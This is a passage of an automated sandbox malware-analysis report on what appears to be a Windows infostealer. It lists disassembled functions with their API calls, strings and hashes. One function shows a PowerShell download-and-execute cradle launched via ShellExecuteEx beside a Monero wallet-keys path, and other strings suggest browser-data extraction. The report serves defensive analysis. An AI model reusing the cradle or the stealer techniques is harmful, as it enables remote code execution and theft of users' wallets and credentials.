                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 969013bb77e1396e9a8b588f4c46766296fe8130879c7ecd933d614eb0b79731
                        • Instruction ID: 3fd916375b8d20603d9b23dcf95d532d050f79efd8eea9f719653b14f037e233
                        • Opcode Fuzzy Hash: 969013bb77e1396e9a8b588f4c46766296fe8130879c7ecd933d614eb0b79731
                        • Instruction Fuzzy Hash: DB012CB5A44209BBE714EBA4DC49F7ABBB8FF48701F108454FB05A7290D67499018B51
                        Function 005F7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0114BEF8,00000000,00020119,005F76B9), ref: 005F775B
                        • RegQueryValueExA.ADVAPI32(005F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 005F777A
                        • RegCloseKey.ADVAPI32(005F76B9), ref: 005F7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: ef0e4529f467f6c4df7bbe94e03b4b1c3d307ce0c48735f0912efcbca75bf027
                        • Instruction ID: 9bd85ae7bef5be62aea305b5af33dcd80daba24dd378b1cec776fe07145d58b1
                        • Opcode Fuzzy Hash: ef0e4529f467f6c4df7bbe94e03b4b1c3d307ce0c48735f0912efcbca75bf027
                        • Instruction Fuzzy Hash: F4014FB5A40309BFEB14DBE0DC4AFBEB7B8FF48701F108559FA05A7281DA746A018B51
                        Function 005F92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(:_,80000000,00000003,00000000,00000003,00000080,00000000,?,005F3AEE,?), ref: 005F92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:_), ref: 005F9319
                        • CloseHandle.KERNEL32(000000FF), ref: 005F9327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :_$:_
                        • API String ID: 1378416451-3093262757
                        • Opcode ID: f9cf910110cf6b698a085144f865fb748172f6248277289fd1add386fae1496b
                        • Instruction ID: 8375105aca043063c77ec0bae3e12196493b5a71c9da06b471ba5f30a6374584
                        • Opcode Fuzzy Hash: f9cf910110cf6b698a085144f865fb748172f6248277289fd1add386fae1496b
                        • Instruction Fuzzy Hash: 82F04F75E40208BBDB24DFB4DC49FAE7BF9BB48710F10CA54BA51A72C0D67496018B44
                        Function 005F40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 005F40D5
                        • RegOpenKeyExA.ADVAPI32(80000001,0115D680,00000000,00020119,?), ref: 005F40F4
                        • RegQueryValueExA.ADVAPI32(?,0115DF30,00000000,00000000,00000000,000000FF), ref: 005F4118
                        • RegCloseKey.ADVAPI32(?), ref: 005F4122
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4147
                        • lstrcat.KERNEL32(?,0115DF00), ref: 005F415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: eedd559108584a0f47ffed171a54cd42890cc31abee1329998d05c12c915596e
                        • Instruction ID: aa0a70efa4705b7c217ce40700de6459e4434f740b77a9942e07133694d5864c
                        • Opcode Fuzzy Hash: eedd559108584a0f47ffed171a54cd42890cc31abee1329998d05c12c915596e
                        • Instruction Fuzzy Hash: E6418BB6D001096BDB28EBA0DC4AFFE773DBF88300F008559B71656181EA755B898F92
                        Function 005E99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                        • LocalFree.KERNEL32(005E148F), ref: 005E9A90
                        • CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 36815791c22d20f5fe35e05622ed6bbae0e19ed550fdbf7fb112ba52616bcaf4
                        • Instruction ID: 7e84314f14ad92bf4375d230c04fc84c886649357190e4b5d394b613c8e79650
                        • Opcode Fuzzy Hash: 36815791c22d20f5fe35e05622ed6bbae0e19ed550fdbf7fb112ba52616bcaf4
                        • Instruction Fuzzy Hash: 60312DB4A00209EFDB28CF95D985FAE7BF5FF48340F108168E915A7290D778A941CFA1
                        Function 005FC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: 787d7874e04d91a0431c00a39337d1a306215dc9c7fc89d79b9b24ca8cf5c10a
                        • Instruction ID: 2df5725cc9fc3577c98853aad6a077f624058ac73565325616fb8a6174c38fab
                        • Opcode Fuzzy Hash: 787d7874e04d91a0431c00a39337d1a306215dc9c7fc89d79b9b24ca8cf5c10a
                        • Instruction Fuzzy Hash: A441D5B150075C5EDB218B248E84BFB7FE9AF45744F1448F8EACA86182D279AA449F60
                        Function 005F4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,0115DF90), ref: 005F47DB
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4801
                        • lstrcat.KERNEL32(?,?), ref: 005F4820
                        • lstrcat.KERNEL32(?,?), ref: 005F4834
                        • lstrcat.KERNEL32(?,0114B6D0), ref: 005F4847
                        • lstrcat.KERNEL32(?,?), ref: 005F485B
                        • lstrcat.KERNEL32(?,0115D980), ref: 005F486F
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005F8D90: GetFileAttributesA.KERNEL32(00000000,?,005E1B54,?,?,0060564C,?,?,00600E1F), ref: 005F8D9F
                          • Part of subcall function 005F4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005F4580
                          • Part of subcall function 005F4570: RtlAllocateHeap.NTDLL(00000000), ref: 005F4587
                          • Part of subcall function 005F4570: wsprintfA.USER32 ref: 005F45A6
                          • Part of subcall function 005F4570: FindFirstFileA.KERNEL32(?,?), ref: 005F45BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 70785f8a2ef4c85b51f5ddbef7d112339913cc9fd283d70ad4173e42503c84ea
                        • Instruction ID: 284ad05cd5e439ba864fe3113ae9b25a98d4f6a0c0cc022b6e2c023cbce78140
                        • Opcode Fuzzy Hash: 70785f8a2ef4c85b51f5ddbef7d112339913cc9fd283d70ad4173e42503c84ea
                        • Instruction Fuzzy Hash: 533162B690020DA7CB24F7B0DC89EF97778BF88700F404599B35996081EEB4D6898F96
                        Function 005F2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F2D85
                        Strings
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 005F2CC4
                        • ')", xrefs: 005F2CB3
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 005F2D04
                        • <, xrefs: 005F2D39
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: c7b21fc9119ed244b80e20b84a684121015c27825ab53606a904e3440827fa88
                        • Instruction ID: a642d664b3bcc64baf00fd5fc32f719497a348ac3017ca67daf35c5f0034e15f
                        • Opcode Fuzzy Hash: c7b21fc9119ed244b80e20b84a684121015c27825ab53606a904e3440827fa88
                        • Instruction Fuzzy Hash: F041D2B1C1010D9ADB18FBA0C895BFDBF74BF54340F508119E60AA7195DFB86A4ACF92
                        Function 005E9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005E9F41
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 65661b4ee4bbb71a958ceab620c8c00b7b58329822c825cf2a4098366a4fc5a5
                        • Instruction ID: 44096abbe355818fd18f2d343cfffe52b9751b593872e367e4e503949ca35b1b
                        • Opcode Fuzzy Hash: 65661b4ee4bbb71a958ceab620c8c00b7b58329822c825cf2a4098366a4fc5a5
                        • Instruction Fuzzy Hash: 5D613E70A1024DDBDB28EFA5CC99FEE7B75BF84340F008418FA4A5B195EB746A05CB52
                        Function 005F70D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • memset.MSVCRT ref: 005F716A
                        Strings
                        • s_, xrefs: 005F7111
                        • s_, xrefs: 005F72AE, 005F7179, 005F717C
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 005F718C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemset
                        • String ID: s_$s_$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 4047604823-1486079241
                        • Opcode ID: 115d6132cdfb6a42112e90ba81f489c1cfbb710b5131ef111e5c70a837ecb683
                        • Instruction ID: 6e5521aac1aa35612e068ce0776c9ab3f8945295411a08e30d1731995a88ec04
                        • Opcode Fuzzy Hash: 115d6132cdfb6a42112e90ba81f489c1cfbb710b5131ef111e5c70a837ecb683
                        • Instruction Fuzzy Hash: C6514FB0D0421D9BDB14EBA0DC89BFEBB74BF48304F5045A8E21967181EB786E88CF55
                        Function 005F7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0114C2B0,00000000,00020119,?), ref: 005F7E5E
                        • RegQueryValueExA.ADVAPI32(?,0115D940,00000000,00000000,000000FF,000000FF), ref: 005F7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 005F7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
